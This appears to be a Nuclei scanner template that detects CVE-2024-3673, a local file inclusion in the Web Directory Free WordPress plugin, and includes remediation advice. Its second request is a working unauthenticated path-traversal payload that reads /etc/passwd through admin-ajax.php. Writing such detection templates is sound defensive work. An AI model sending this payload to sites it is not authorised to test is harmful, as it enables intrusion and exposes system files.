id: CVE-2024-3673 info: name: Web Directory Free < 1.7.3 - Local File Inclusion author: s4e-io severity: critical description: | The Web Directory Free WordPress plugin before 1.7.3 does not validate a parameter before using it in an include(), which could lead to Local File Inclusion issues. impact: | Unauthenticated attackers can exploit LFI to read sensitive files including /etc/passwd via the template parameter. remediation: | Update Web Directory Free to version 1.7.3 or later. reference: - https://wpscan.com/vulnerability/0e8930cb-e176-4406-a43f-a6032471debf/ - https://nvd.nist.gov/vuln/detail/CVE-2024-3673 - https://vuldb.com/?id.276216 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H cvss-score: 9.1 cve-id: CVE-2024-3673 epss-score: 0.05578 epss-percentile: 0.91888 metadata: verified: true max-request: 2 vendor: salephpscripts product: web-directory-free publicwww-query: "/wp-content/plugins/web-directory-free" tags: cve,cve2024,wordpress,wp-plugin,wp,lfi,web-directory-free,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body, "/wp-content/plugins/web-directory-free")' - 'status_code == 200' condition: and internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded from_set_ajax=1&action=w2dc_controller_request&template=../../../../../etc/passwd matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: content_type words: - 'text/html' - type: status status: - 200 # digest: 4a0a00473045022063ac1722269c276a102d1eeca1939d908a02487d9188663f64a6473af42de26f022100e02506d6854f6911025f5f47fbf7038a32692d997d05944c7fac64eab7811cec:922c64590222798bb761d5b6d8e72950